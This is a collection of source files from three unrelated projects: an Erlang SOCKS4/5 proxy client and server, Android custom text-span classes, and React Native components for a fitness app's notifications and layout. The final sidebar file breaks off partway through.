<|start_filename|>apps/proxy_client/src/proxy_client_srv.erl<|end_filename|>
%%%-------------------------------------------------------------------
%%% @author <NAME> <<EMAIL>>
%%% @copyright (C) 2013, <NAME>
%%% @doc
%%%
%%% @end
%%% Created : 8 Apr 2013 by <NAME> <<EMAIL>>
%%%-------------------------------------------------------------------
-module(proxy_client_srv).
-behaviour(gen_server).
%% API
-export([start_link/0]).
%% gen_server callbacks
-export([init/1, handle_call/3, handle_cast/2, handle_info/2,
terminate/2, code_change/3]).
-define(SERVER, ?MODULE).
-define(RETRY_TIMES, 2).
%% sock: the client's local listening socket
-record(state, {sock}).
-include("proxy_defs.hrl").
-define(SOCK_OPTIONS,
[binary,
{reuseaddr, true},
{active, false},
{nodelay, true}
]).
%%%===================================================================
%%% API
%%%===================================================================
%%--------------------------------------------------------------------
%% @doc
%% Starts the server
%%
%% @spec start_link() -> {ok, Pid} | ignore | {error, Error}
%% @end
%%--------------------------------------------------------------------
start_link() ->
gen_server:start_link({local, ?SERVER}, ?MODULE, [], []).
%%%===================================================================
%%% gen_server callbacks
%%%===================================================================
%%--------------------------------------------------------------------
%% @private
%% @doc
%% Initializes the server
%%
%% @spec init(Args) -> {ok, State} |
%% {ok, State, Timeout} |
%% ignore |
%% {stop, Reason}
%% @end
%%--------------------------------------------------------------------
init([]) ->
ConfFile = filename:join(code:priv_dir(proxy_client), "client.conf"),
case file:consult(ConfFile) of
{ok, Conf} ->
ListenPort = proplists:get_value(listen_port, Conf),
ListenIP = proplists:get_value(listen_ip, Conf),
{ok, Socket} = gen_tcp:listen(ListenPort, [{ip, ListenIP} | ?SOCK_OPTIONS]),
{ok, #state{sock=Socket}, 0};
{error, _} ->
{stop, conf_file_error}
end.
%%--------------------------------------------------------------------
%% @private
%% @doc
%% Handling call messages
%%
%% @spec handle_call(Request, From, State) ->
%% {reply, Reply, State} |
%% {reply, Reply, State, Timeout} |
%% {noreply, State} |
%% {noreply, State, Timeout} |
%% {stop, Reason, Reply, State} |
%% {stop, Reason, State}
%% @end
%%--------------------------------------------------------------------
handle_call(_Request, _From, State) ->
Reply = ok,
{reply, Reply, State}.
%%--------------------------------------------------------------------
%% @private
%% @doc
%% Handling cast messages
%%
%% @spec handle_cast(Msg, State) -> {noreply, State} |
%% {noreply, State, Timeout} |
%% {stop, Reason, State}
%% @end
%%--------------------------------------------------------------------
handle_cast(_Msg, State) ->
{noreply, State}.
%%--------------------------------------------------------------------
%% @private
%% @doc
%% Handling all non call/cast messages
%%
%% @spec handle_info(Info, State) -> {noreply, State} |
%% {noreply, State, Timeout} |
%% {stop, Reason, State}
%% @end
%%--------------------------------------------------------------------
handle_info(timeout, #state{sock=Socket}) ->
accept_loop(Socket); % never returns
handle_info(_Info, State) ->
{noreply, State}.
%%--------------------------------------------------------------------
%% @private
%% @doc
%% This function is called by a gen_server when it is about to
%% terminate. It should be the opposite of Module:init/1 and do any
%% necessary cleaning up. When it returns, the gen_server terminates
%% with Reason. The return value is ignored.
%%
%% @spec terminate(Reason, State) -> void()
%% @end
%%--------------------------------------------------------------------
terminate(_Reason, #state{sock=Socket}) ->
gen_tcp:close(Socket),
ok.
%%--------------------------------------------------------------------
%% @private
%% @doc
%% Convert process state when code is changed
%%
%% @spec code_change(OldVsn, State, Extra) -> {ok, NewState}
%% @end
%%--------------------------------------------------------------------
code_change(_OldVsn, State, _Extra) ->
{ok, State}.
%%%===================================================================
%%% Internal functions
%%%===================================================================
accept_loop(Socket) ->
{ok, Client} = gen_tcp:accept(Socket),
%% {ok, Pid} = proxy_client_worker_sup:start_child(Client),
%% case gen_tcp:controlling_process(Client, Pid) of
%% ok ->
%% ok;
%% {error, Reason} ->
%% ?LOG("~p, accept_loop controlling_process error: ~p~n", [Client, Reason])
%% end,
%% here we distinguish between `try` and `retry`: tries = retries + 1
start_worker_and_hand_over(Client, ?RETRY_TIMES + 1),
accept_loop(Socket).
start_worker_and_hand_over(_Client, 0) ->
?LOG("start_worker_and_hand_over ~p max retry over~n", [_Client]),
{error, max_retry};
start_worker_and_hand_over(Client, Trys) ->
{ok, Pid} = supervisor:start_child(proxy_client_worker_sup, [Client]),
case gen_tcp:controlling_process(Client, Pid) of
ok ->
{ok, Pid};
{error, closed} ->
?LOG("start_worker_and_hand_over ~p client socket closed!~n", [Client]),
supervisor:terminate_child(proxy_client_worker_sup, Pid),
{error, client_closed};
{error, _Reason} ->
supervisor:terminate_child(proxy_client_worker_sup, Pid),
?LOG("start_worker_and_hand_over ~p set controlling_process error: ~p, retry!~n", [Client, _Reason]),
start_worker_and_hand_over(Client, Trys - 1)
end.
<|start_filename|>apps/proxy_client/src/proxy_client.erl<|end_filename|>
-module(proxy_client).
-behaviour(application).
%% Application callbacks
-export([start/2, stop/1]).
-export([start/0]).
%% ===================================================================
%% Application callbacks
%% ===================================================================
start(_StartType, _StartArgs) ->
proxy_client_sup:start_link().
stop(_State) ->
ok.
start() ->
application:start(?MODULE).
<|start_filename|>apps/proxy_server/src/proxy_server.erl<|end_filename|>
-module(proxy_server).
-export([start/0]).
-export([start_process/0,
start_process/1,
accept/1,
start_server/0]).
-include("utils.hrl").
%% WORKER_NUMS - how many worker processes are spawned when the server starts
%% WORKER_TIMEOUT - an idle worker process will exit after this timeout;
%% this is used to reduce the number of spawned worker processes.
-define(CONNECT_RETRY_TIMES, 2).
-define(WORKER_NUMS, 30).
-define(WORKER_TIMEOUT, 600000).
-define(TIMEOUT, 10000).
-ifdef(DEBUG).
-define(LOG(Msg, Args), io:format(Msg, Args)).
-else.
-define(LOG(Msg, Args), true).
-endif.
-define(SOCK_OPTIONS,
[binary,
{reuseaddr, true},
{active, false},
{nodelay, true}
]).
start() ->
ConfFile = filename:join(code:priv_dir(proxy_server), "server.conf"),
case file:consult(ConfFile) of
{ok, Conf} ->
ListenPort = proplists:get_value(listen_port, Conf),
ListenIP = proplists:get_value(listen_ip, Conf);
{error, _} ->
ListenPort = 8080,
ListenIP = {0,0,0,0}
end,
{ok, Socket} = gen_tcp:listen(ListenPort, [{ip, ListenIP} | ?SOCK_OPTIONS]),
?LOG("Proxy server listen on ~p : ~p~n", [ListenIP, ListenPort]),
register(proxy_gate, self()),
register(server, spawn(?MODULE, start_server, [])),
accept(Socket).
accept(Socket) ->
{ok, Client} = gen_tcp:accept(Socket),
server ! choosepid,
receive
{ok, Pid} ->
ok = gen_tcp:controlling_process(Client, Pid),
Pid ! {connect, Client},
accept(Socket);
{stop, From, _Reason} ->
From ! {ack, stop},
?LOG("Calling stop reason: ~p~n", [_Reason]),
gen_tcp:close(Socket)
after ?TIMEOUT ->
gen_tcp:close(Client),
accept(Socket)
end.
start_server() ->
loop(start_workers(?WORKER_NUMS)).
%% main loop, accept new connections, reuse workers, and purge dead workers.
loop(Workers) ->
NewWorkers =
receive
choosepid ->
manage_workers(choosepid, Workers);
{'DOWN', _Ref, process, Pid, timeout} ->
manage_workers(timeout, Workers, Pid);
{reuse, Pid} ->
manage_workers(reuse, Workers, Pid)
end,
loop(NewWorkers).
%% spawn some workers to serve as the worker pool.
start_workers(Num) ->
start_workers(Num, []).
start_workers(0, Workers) ->
Workers;
start_workers(Num, Workers) ->
{Pid, _Ref} = spawn_monitor(?MODULE, start_process, []),
start_workers(Num-1, [Pid | Workers]).
manage_workers(choosepid, []) ->
[Head | Tail] = start_workers(?WORKER_NUMS),
proxy_gate ! {ok, Head},
Tail;
manage_workers(choosepid, [Head | Tail]) ->
proxy_gate ! {ok, Head},
Tail.
manage_workers(timeout, Works, Pid) ->
?LOG("Clear timeout pid: ~p~n", [Pid]),
lists:delete(Pid, Works);
manage_workers(reuse, Works, Pid) ->
?LOG("Reuse Pid, back to pool: ~p~n", [Pid]),
%% this reused pid MUST be put at the tail of the workers list,
%% so that the other workers can be chosen and used as well.
Works ++ [Pid].
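%% Worker lifecycle: each worker is spawned with spawn_monitor/3 and blocks in
%% start_process/0 waiting for a {connect, Client} message. After serving one
%% client it sends {reuse, self()} back to the pool and waits for the next one;
%% if it stays idle for ?WORKER_TIMEOUT it exits with reason timeout, which the
%% monitor turns into a 'DOWN' message so the pool can drop the dead pid. If
%% the pool is empty when a connection arrives, a fresh batch of ?WORKER_NUMS
%% workers is spawned.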
start_process() ->
receive
{connect, Client} ->
start_process(Client),
server ! {reuse, self()},
start_process()
after ?WORKER_TIMEOUT ->
exit(timeout)
end.
start_process(Client) ->
case gen_tcp:recv(Client, 1) of
{ok, Data} ->
parse_address(Client, proxy_transform:transform(Data));
{error, _Error} ->
?LOG("start recv client error: ~p~n", [_Error]),
gen_tcp:close(Client)
end,
ok.
parse_address(Client, AType) when AType =:= <<?IPV4>> ->
{ok, Data} = gen_tcp:recv(Client, 6),
<<Port:16, Destination/binary>> = proxy_transform:transform(Data),
Address = list_to_tuple( binary_to_list(Destination) ),
communicate(Client, Address, Port);
parse_address(Client, AType) when AType =:= <<?IPV6>> ->
{ok, Data} = gen_tcp:recv(Client, 18),
<<Port:16, Destination/binary>> = proxy_transform:transform(Data),
Address = list_to_tuple( binary_to_list(Destination) ),
communicate(Client, Address, Port);
parse_address(Client, AType) when AType =:= <<?DOMAIN>> ->
{ok, Data} = gen_tcp:recv(Client, 3),
<<Port:16, DomainLen:8>> = proxy_transform:transform(Data),
{ok, DataRest} = gen_tcp:recv(Client, DomainLen),
Destination = proxy_transform:transform(DataRest),
Address = binary_to_list(Destination),
communicate(Client, Address, Port);
parse_address(Client, _AType) ->
%% received invalid data; close the connection
?LOG("Invalid data!~n", []),
gen_tcp:close(Client).
communicate(Client, Address, Port) ->
?LOG("Address: ~p, Port: ~p~n", [Address, Port]),
case connect_target(Address, Port, ?CONNECT_RETRY_TIMES) of
{ok, TargetSocket} ->
transfer(Client, TargetSocket);
error ->
?LOG("Connect Address Error: ~p:~p~n", [Address, Port]),
gen_tcp:close(Client)
end.
connect_target(_, _, 0) ->
error;
connect_target(Address, Port, Times) ->
case gen_tcp:connect(Address, Port, ?SOCK_OPTIONS, ?TIMEOUT) of
{ok, TargetSocket} ->
{ok, TargetSocket};
{error, _Error} ->
connect_target(Address, Port, Times-1)
end.
transfer(Client, Remote) ->
inet:setopts(Remote, [{active, once}]),
inet:setopts(Client, [{active, once}]),
receive
{tcp, Client, Request} ->
case gen_tcp:send(Remote, proxy_transform:transform(Request)) of
ok ->
transfer(Client, Remote);
{error, _Error} ->
ok
end;
{tcp, Remote, Response} ->
%% the client may close the connection while data is being transferred
case gen_tcp:send(Client, proxy_transform:transform(Response)) of
ok ->
transfer(Client, Remote);
{error, _Error} ->
ok
end;
{tcp_closed, Client} ->
ok;
{tcp_closed, Remote} ->
ok;
{tcp_error, Client, _Reason} ->
ok;
{tcp_error, Remote, _Reason} ->
ok
end,
gen_tcp:close(Remote),
gen_tcp:close(Client),
ok.
<|start_filename|>apps/proxy_client/src/proxy_proto_socks4.erl<|end_filename|>
%%%-------------------------------------------------------------------
%%% @author <NAME> <<EMAIL>>
%%% @copyright (C) 2013, <NAME>
%%% @doc
%%%
%%% @end
%%% Created : 10 Apr 2013 by <NAME> <<EMAIL>>
%%%-------------------------------------------------------------------
-module(proxy_proto_socks4).
%% API
-export([]).
-compile([export_all]).
%%%===================================================================
%%% API
%%%===================================================================
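%% A SOCKS4 CONNECT request looks like
%% <<16#04, 16#01, Port:16, Address:32, UserId/binary, 0>>.
%% The `Address =< 16#FF` guard below handles the SOCKS4a extension: a
%% destination address of the form 0.0.0.x signals that a NUL-terminated
%% domain name follows the user id instead of a usable IPv4 address.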
parse_greeting_request(<<16#04:8, CmdCode:8, Port:16, Address:32, Rest/binary>>) ->
case CmdCode of
16#01 when Address =< 16#FF ->
[UserId, DomainBin, <<>>] = binary:split(Rest, <<0>>, [global]),
{connect, UserId, {domain, DomainBin, Port}};
16#01 ->
[UserId, <<>>] = binary:split(Rest, <<0>>, [global]),
{connect, UserId, {ipv4, Address, Port}};
16#02 ->
{error, not_implemented_yet}
end.
unparse_greeting_response(granted) ->
<<0:8, 16#5a:8, 16#FFFF:16, 16#FFFFFFFF:32>>;
unparse_greeting_response(rejected) ->
<<0:8, 16#5b:8, 16#FFFF:16, 16#FFFFFFFF:32>>.
unparse_connection_response({granted, _}) ->
unparse_greeting_response(granted);
unparse_connection_response({rejected, _}) ->
unparse_greeting_response(rejected).
%%%===================================================================
%%% Internal functions
%%%===================================================================
<|start_filename|>apps/proxy_client/src/proxy_proto_socks5.erl<|end_filename|>
%%%-------------------------------------------------------------------
%%% @author <NAME> <<EMAIL>>
%%% @copyright (C) 2013, <NAME>
%%% @doc
%%%
%%% @end
%%% Created : 10 Apr 2013 by <NAME> <<EMAIL>>
%%%-------------------------------------------------------------------
-module(proxy_proto_socks5).
%% API
-export([]).
-compile([export_all]).
-define(IPV4, 16#01).
-define(IPV6, 16#04).
-define(DOMAIN, 16#03).
%%%===================================================================
%%% API
%%%===================================================================
parse_greeting_request(<<16#05:8, NumMethods:8, Methods:NumMethods/binary>>) ->
{auth_methods, Methods}.
unparse_greeting_response(Method) ->
MethodProp = [{no_auth, 16#00},
{user_pass, 16#02}],   %% 16#02 = username/password auth method (RFC 1928)
Code = proplists:get_value(Method, MethodProp),
<<16#05:8, Code:8>>.
parse_auth_request(user_pass, _) ->
{error, not_implemented_yet}.
parse_connection_request(<<16#05:8, CmdCode:8, 0:8, AddrType:8, Rest/binary>>) ->
case CmdCode of
%% CONNECT
16#01 ->
case AddrType of
?IPV4 ->
<<Address:32, Port:16>> = Rest,
{connect, {ipv4, Address, Port}};
?IPV6 ->
<<Address:128, Port:16>> = Rest,
{connect, {ipv6, Address, Port}};
?DOMAIN ->
<<DomainLen:8, DomainBin:DomainLen/binary, Port:16>> = Rest,
%<<?DOMAIN, Port:16, DomainLen:8, DomainBin/binary>>
{connect, {domain, DomainBin, Port}}
end;
%% BIND
16#02 ->
{error, not_implemented_yet};
%% UDP ASSOCIATE
16#03 ->
{error, not_implemented_yet}
end.
unparse_connection_response({granted, {ipv4, IP, Port}}) ->
<<16#05:8, 16#00:8, 0:8, ?IPV4, IP/binary, Port:16>>;
unparse_connection_response({granted, {ipv6, IP, Port}}) ->
<<16#05:8, 16#00:8, 0:8, ?IPV6, IP/binary, Port:16>>;
unparse_connection_response({granted, {domain, DomainBin, Port}}) ->
<<16#05:8, 16#00:8, 0:8, ?DOMAIN, (byte_size(DomainBin)):8, DomainBin/binary, Port:16>>;
unparse_connection_response({rejected, _}) ->
<<16#05:8, 16#03:8, 0:8>>.
%%%===================================================================
%%% Internal functions
%%%===================================================================
| andelf/erlang-proxy |
<|start_filename|>app/src/main/java/com/flavienlaurent/spanimated/MutableForegroundColorSpan.java<|end_filename|>
package com.flavienlaurent.spanimated;
import android.graphics.Color;
import android.os.Parcel;
import android.text.TextPaint;
import android.text.style.ForegroundColorSpan;
public class MutableForegroundColorSpan extends ForegroundColorSpan {
private int mAlpha = 255;
private int mForegroundColor;
public MutableForegroundColorSpan(int alpha, int color) {
super(color);
mAlpha = alpha;
mForegroundColor = color;
}
public MutableForegroundColorSpan(Parcel src) {
super(src);
mForegroundColor = src.readInt();
mAlpha = src.readInt();
}
public void writeToParcel(Parcel dest, int flags) {
super.writeToParcel(dest, flags);
dest.writeInt(mForegroundColor);
dest.writeInt(mAlpha); // must match the readInt() in the Parcel constructor
}
@Override
public void updateDrawState(TextPaint ds) {
ds.setColor(getForegroundColor());
}
/**
* @param alpha from 0 to 255
*/
public void setAlpha(int alpha) {
mAlpha = alpha;
}
public void setForegroundColor(int foregroundColor) {
mForegroundColor = foregroundColor;
}
public float getAlpha() {
return mAlpha;
}
@Override
public int getForegroundColor() {
return Color.argb(mAlpha, Color.red(mForegroundColor), Color.green(mForegroundColor), Color.blue(mForegroundColor));
}
}
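// Illustrative usage (the `textView` variable below is assumed to exist in the
// caller's scope): apply the span to a SpannableString and mutate its alpha,
// e.g. from a ValueAnimator update listener; re-setting the text forces the
// TextView to redraw the span with the new color.
//
//   MutableForegroundColorSpan span = new MutableForegroundColorSpan(0, Color.BLACK);
//   SpannableString text = new SpannableString("Hello");
//   text.setSpan(span, 0, text.length(), Spanned.SPAN_INCLUSIVE_INCLUSIVE);
//   span.setAlpha(128);      // 0..255
//   textView.setText(text);  // apply / refresh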
<|start_filename|>app/src/main/java/com/flavienlaurent/spanimated/StrikeSpan.java<|end_filename|>
package com.flavienlaurent.spanimated;
import android.graphics.Canvas;
import android.graphics.Color;
import android.graphics.Paint;
import android.graphics.RectF;
import android.text.style.ReplacementSpan;
/**
*/
public class StrikeSpan extends ReplacementSpan {
private final Paint mPaint;
private int mWidth;
public StrikeSpan(int strokeWidth) {
mPaint = new Paint();
mPaint.setStyle(Paint.Style.STROKE);
mPaint.setColor(Color.BLUE);
mPaint.setAntiAlias(true);
mPaint.setStrokeWidth(strokeWidth);
}
@Override
public int getSize(Paint paint, CharSequence text, int start, int end, Paint.FontMetricsInt fm) {
mWidth = (int) paint.measureText(text, start, end);
return mWidth;
}
@Override
public void draw(Canvas canvas, CharSequence text, int start, int end, float x, int top, int y, int bottom, Paint paint) {
float centerY = (top + bottom) * 0.5f;
canvas.drawText(text, start, end, x, y, paint);
canvas.drawLine(x, centerY, x + mWidth, centerY, mPaint);
}
}
<|start_filename|>app/src/main/java/com/flavienlaurent/spanimated/BubbleSpan.java<|end_filename|>
package com.flavienlaurent.spanimated;
import android.graphics.Canvas;
import android.graphics.Color;
import android.graphics.Paint;
import android.graphics.RectF;
import android.text.style.ReplacementSpan;
import java.util.Random;
public class BubbleSpan extends ReplacementSpan {
private static final String TAG = "BubbleSpan";
private static final boolean DEBUG = false;
private Paint mPaint;
static Random random = new Random();
private int mWidth = -1;
private RectF mRectF = new RectF();
private int[] mColors = new int[20];
public BubbleSpan() {
initPaint();
initColors();
}
private void initPaint() {
mPaint = new Paint();
mPaint.setColor(Color.rgb(random.nextInt(255), random.nextInt(255), random.nextInt(255)));
mPaint.setAntiAlias(true);
}
private void initColors() {
for(int index = 0 ; index < mColors.length ; index++) {
mColors[index] = Color.rgb(random.nextInt(255), random.nextInt(255), random.nextInt(255));
}
}
@Override
public int getSize(Paint paint, CharSequence text, int start, int end, Paint.FontMetricsInt fm) {
// return the text width measured with the given Paint
mWidth = (int) paint.measureText(text, start, end);
return mWidth;
}
@Override
public void draw(Canvas canvas, CharSequence text, int start, int end, float x, int top, int y, int bottom, Paint paint) {
float charx = x;
for(int i = start ; i<end; i++) {
String charAt = extractText(text, i, i + 1);
float charWidth = paint.measureText(charAt);
mRectF.set(charx, top, charx += charWidth, bottom);
mPaint.setColor(mColors[i % mColors.length]);
canvas.drawOval(mRectF, mPaint);
}
canvas.drawText(text, start, end, x, y, paint);
}
private String extractText(CharSequence text, int start, int end) {
return text.subSequence(start, end).toString();
}
}
<|start_filename|>app/src/main/java/com/flavienlaurent/spanimated/MutableBlurMaskFilterSpan.java<|end_filename|>
package com.flavienlaurent.spanimated;
import android.graphics.BlurMaskFilter;
import android.graphics.MaskFilter;
import android.text.TextPaint;
import android.text.style.CharacterStyle;
import android.text.style.UpdateAppearance;
public class MutableBlurMaskFilterSpan extends CharacterStyle implements UpdateAppearance {
private static final String TAG = "MutableBlurMaskFilterSpan";
private float mRadius;
private MaskFilter mFilter;
public MutableBlurMaskFilterSpan(float radius) {
mRadius = radius;
}
public void setRadius(float radius) {
mRadius = radius;
mFilter = new BlurMaskFilter(mRadius, BlurMaskFilter.Blur.NORMAL);
}
public float getRadius() {
return mRadius;
}
public MaskFilter getFilter() {
return mFilter;
}
@Override
public void updateDrawState(TextPaint ds) {
ds.setMaskFilter(mFilter);
}
} | flavienlaurent/spans |
<|start_filename|>index.ios.js<|end_filename|>
import React, { Component } from 'react';
import { AppRegistry } from 'react-native';
import { Provider } from 'react-redux';
import configureStore from './app/configureStore';
import Main from './app/containers/main';
const store = configureStore();
class Root extends Component {
render() {
return (
<Provider store={store}>
<Main />
</Provider>
);
}
}
AppRegistry.registerComponent('ProFit', () => Root);
<|start_filename|>app/components/list-item.js<|end_filename|>
import React, { Component } from 'react';
import I18n, { moment } from './../locales';
import Ionicons from 'react-native-vector-icons/Ionicons';
import { removeNotification } from './../actions';
import {
StyleSheet,
View,
Text,
TouchableOpacity
} from 'react-native';
import { connect } from 'react-redux';
class ListItem extends Component {
render() {
const {
dispatch,
editModeNotifications,
item
} = this.props;
return (
<View style={{flexDirection: 'row'}}>
{ editModeNotifications &&
<TouchableOpacity
onPress={() => dispatch(removeNotification(item))}
>
<View style={styles.removeIcon}>
<Ionicons name='ios-remove-circle' size={25} color={'#e92038'} />
</View>
</TouchableOpacity>
}
<View style={styles.listItem}>
<Text style={styles.listItemText}>
{moment(item.date).calendar()}
</Text>
</View>
</View>
);
}
}
const styles = StyleSheet.create({
listItemText: {
fontSize: 18,
},
listItem: {
flex: 1,
padding: 10,
backgroundColor: '#fff',
borderBottomWidth: .5,
borderBottomColor: '#aaa'
},
removeIcon: {
padding: 8
}
});
const mapStateToProps = (state) => {
const {
editModeNotifications
} = state
return {
editModeNotifications
}
}
export default connect(mapStateToProps)(ListItem);
<|start_filename|>app/components/index.js<|end_filename|>
import Workouts from './workouts';
import Food from './food';
import Notifications from './notifications';
import NewNotificationPopup from './new-notification-popup';
import NavButton from './nav-button';
import Layout from './layout';
import ListItem from './list-item';
import Sidebar from './sidebar';
import SidebarBody from './sidebar-body';
export {
Workouts,
Food,
Notifications,
NewNotificationPopup,
NavButton,
Layout,
ListItem,
Sidebar,
SidebarBody
}
<|start_filename|>app/components/notifications.js<|end_filename|>
import React, { Component } from 'react';
import I18n, { moment } from './../locales';
import Icon from 'react-native-vector-icons/MaterialIcons';
import {
openNewNotificationPopup,
getNotifications,
enableEditModeNotifications,
disableEditModeNotifications
} from './../actions';
import {
AsyncStorage,
StyleSheet,
ListView,
TouchableHighlight,
TouchableOpacity,
View,
Text
} from 'react-native';
import {
Layout,
NavButton,
ListItem,
NewNotificationPopup
} from './';
import { connect } from 'react-redux';
class Notifications extends Component {
componentDidMount() {
const { dispatch } = this.props;
dispatch(getNotifications());
}
render() {
const {
dispatch,
notifications,
editNotifications,
editModeNotifications,
newNotificationPopup
} = this.props;
let ds = new ListView.DataSource({rowHasChanged: (r1, r2) => r1 !== r2});
const notifications_items = ds.cloneWithRows(notifications.items);
return (
<Layout
menu={this.props.menu}
title={I18n.t('notifications')}
image={require('./../images/layout4.png')}
left={() =>
<View>
{ editNotifications &&
<View>
{ editModeNotifications ?
<NavButton
name={I18n.t('done')}
onPress={() => dispatch(disableEditModeNotifications())}
/>
:
<NavButton
name={I18n.t('edit')}
onPress={() => dispatch(enableEditModeNotifications())}
/>
}
</View>
}
</View>
}
right={() =>
<NavButton
right={true}
name={I18n.t('add')}
onPress={() => {
dispatch(disableEditModeNotifications());
dispatch(openNewNotificationPopup())
}}
/>
}>
<ListView
dataSource={notifications_items}
enableEmptySections={true}
renderRow={(item, _, index) =>
<ListItem item={item} key={index} />
}/>
{newNotificationPopup.open && <NewNotificationPopup />}
</Layout>
)
}
}
const styles = StyleSheet.create({
list: {
flex: 1
},
});
const mapStateToProps = (state) => {
const {
notifications,
newNotificationPopup,
editNotifications,
editModeNotifications
} = state
return {
notifications,
newNotificationPopup,
editNotifications,
editModeNotifications
}
}
export default connect(mapStateToProps)(Notifications);
<|start_filename|>app/components/food.js<|end_filename|>
import React, { Component } from 'react';
import I18n from './../locales';
import { connect } from 'react-redux';
import { loadNotifications } from './../actions';
import Ionicons from 'react-native-vector-icons/Ionicons';
import {
Notifications,
Layout
} from './';
import {
PushNotificationIOS,
ActivityIndicatorIOS,
StyleSheet,
TabBarIOS,
Text,
View,
ListView,
Modal,
TouchableHighlight
} from 'react-native';
class Food extends Component {
constructor(props) {
super(props);
this.state = {selected: 'programs'};
}
componentDidMount() {
PushNotificationIOS.requestPermissions();
}
render() {
return (
<TabBarIOS
unselectedTintColor='white'
tintColor='#000'
barTintColor='#fff'>
<Ionicons.TabBarItemIOS
title={I18n.t('programs')}
iconName='ios-locate-outline'
selectedIconName='ios-locate'
selected={this.state.selected === 'programs'}
onPress={() => {
this.setState({selected: 'programs'});
}}>
<Layout
menu={I18n.t('food')}
title={I18n.t('programs')}>
</Layout>
</Ionicons.TabBarItemIOS>
<Ionicons.TabBarItemIOS
title={I18n.t('journal')}
iconName='ios-calendar-outline'
selectedIconName='ios-calendar'
selected={this.state.selected === 'journal'}
onPress={() => {
this.setState({selected: 'journal'});
}}>
<Layout
menu={I18n.t('food')}
title={I18n.t('journal')}>
</Layout>
</Ionicons.TabBarItemIOS>
<Ionicons.TabBarItemIOS
title={I18n.t('products')}
iconName='ios-list-box-outline'
selectedIconName='ios-list-box'
selected={this.state.selected === 'list'}
onPress={() => {
this.setState({selected: 'list'});
}}>
<Layout
menu={I18n.t('food')}
title={I18n.t('products')}>
</Layout>
</Ionicons.TabBarItemIOS>
<Ionicons.TabBarItemIOS
title={I18n.t('water')}
iconName='ios-water-outline'
selectedIconName='ios-water'
selected={this.state.selected === 'water'}
onPress={() => {
this.setState({selected: 'water'});
}}>
<Layout
menu={I18n.t('food')}
title={I18n.t('water')}>
</Layout>
</Ionicons.TabBarItemIOS>
<Ionicons.TabBarItemIOS
title={I18n.t('notifications')}
iconName='ios-alarm-outline'
selectedIconName='ios-alarm'
selected={this.state.selected === 'notifications'}
onPress={() => {
this.setState({selected: 'notifications'});
}}>
<Notifications menu={I18n.t('food')} />
</Ionicons.TabBarItemIOS>
</TabBarIOS>
);
}
}
const mapStateToProps = (state) => {
return {}
}
export default connect(mapStateToProps)(Food)
<|start_filename|>app/components/new-notification-popup.js<|end_filename|>
import React, { Component } from 'react';
import I18n from './../locales';
import { connect } from 'react-redux';
import {
closeNewNotificationPopup,
addNotification
} from './../actions';
import {
Layout,
NavButton
} from './';
import {
DatePickerIOS,
Modal,
StyleSheet,
View,
Text,
TouchableOpacity
} from 'react-native';
class NewNotificationPopup extends Component {
constructor(props) {
super(props);
this.state = {date: new Date()};
console.ignoredYellowBox = [
'Warning: Failed propType',
];
}
onDateChange(date) {
this.setState({date});
}
render() {
const { dispatch, newNotificationPopup } = this.props;
return (
<Modal
transparent={true}
animated={true}>
<Layout
modal={true}
left={() =>
<NavButton
name={I18n.t('close')}
onPress={() => dispatch(closeNewNotificationPopup())}
/>
}
right={() =>
<NavButton
right={true}
name={I18n.t('done')}
onPress={() => {
dispatch(addNotification(this.state.date));
dispatch(closeNewNotificationPopup());
}}
/>
}
title={I18n.t('newNotification')}>
<View style={styles.modal}>
<DatePickerIOS
date={this.state.date}
mode='datetime'
onDateChange={this.onDateChange.bind(this)}
/>
<Text style={styles.remind}>{I18n.t('will_remind_hour_before')}</Text>
</View>
</Layout>
</Modal>
)
}
}
const styles = StyleSheet.create({
modal: {
flex: 1,
backgroundColor: '#fff'
},
close: {
fontSize: 14,
textAlign: 'left'
},
done: {
fontSize: 14,
textAlign: 'right'
},
remind: {
padding: 15,
textAlign: 'center'
}
});
const mapStateToProps = (state) => {
const { newNotificationPopup } = state
return { newNotificationPopup }
}
export default connect(mapStateToProps)(NewNotificationPopup);
<|start_filename|>app/components/layout.js<|end_filename|>
import React, { Component } from 'react';
import Ionicons from 'react-native-vector-icons/Ionicons';
import {
openSidebar
} from './../actions';
import {
StatusBar,
StyleSheet,
TouchableOpacity,
View,
Text,
Image,
TouchableHighlight
} from 'react-native';
import { connect } from 'react-redux';
class Layout extends Component {
render() {
const { dispatch, modal, sidebar } = this.props;
return (
<View style={styles.layout}>
<StatusBar barStyle={sidebar ? 'default' : 'light-content'} />
<Image source={this.props.image || require('./../images/layout.png')} style={styles.headerImage}>
<View>
{ modal ||
<View style={styles.headerTop}>
<TouchableOpacity
onPress={() => dispatch(openSidebar())}
>
<Ionicons style={styles.bars} name='ios-menu-outline' color='#fff' size={35} />
</TouchableOpacity>
{ this.props.menu &&
<Text style={styles.menuTitle}>{this.props.menu}</Text>
}
</View>
}
<View style={[styles.header, modal ? styles.headerModal : {}]}>
<View style={styles.left}>
{ this.props.left && this.props.left() }
</View>
<Text style={styles.title}>{this.props.title}</Text>
<View style={styles.right}>
{ this.props.right && this.props.right() }
</View>
</View>
</View>
</Image>
<View style={styles.layoutInner}>
{this.props.children}
</View>
</View>
)
}
}
const styles = StyleSheet.create({
layout: {
flex: 1,
backgroundColor: 'transparent'
},
layoutInner: {
flex: 1,
backgroundColor: '#f5f5f5'
},
bars: {
padding: 10,
marginTop: -10,
marginLeft: -5,
},
headerTop: {
marginTop: 10,
padding: 15,
flexDirection: 'row'
},
menuTitle: {
marginLeft: 10,
marginTop: 7,
fontSize: 18,
color: '#fff'
},
headerImage: {
width: null,
height: null,
resizeMode: 'cover',
},
header: {
padding: 5,
paddingTop: 80,
height: 120,
alignItems: 'center',
flexDirection: 'row',
justifyContent: 'space-between',
},
headerModal: {
paddingTop: 30,
height: 70
},
left: {
flex: 1
},
right: {
flex: 1
},
title: {
flex: 2,
color: '#fff',
fontSize: 18,
fontWeight: '500',
lineHeight: 18,
textAlign: 'center',
}
});
const mapStateToProps = (state) => {
const { sidebar } = state;
return { sidebar }
}
export default connect(mapStateToProps)(Layout);
<|start_filename|>app/components/sidebar.js<|end_filename|>
import {
StyleSheet,
Animated,
View,
Text,
TouchableWithoutFeedback
} from 'react-native';
import {
closeSidebar
} from './../actions';
import {
SidebarBody
} from './';
import { connect } from 'react-redux';
import React, { Component } from 'react';
const WIDTH = 250;
class Sidebar extends Component {
constructor(props) {
super(props);
const { dispatch } = props;
let left = new Animated.Value(-WIDTH);
left.addListener(({ value }) => {
if (value == -WIDTH) {
dispatch(closeSidebar());
}
});
this.state = {left};
}
componentDidMount() {
Animated.timing(
this.state.left,
{toValue: 0}
).start();
}
render() {
const { dispatch, sidebar } = this.props;
return (
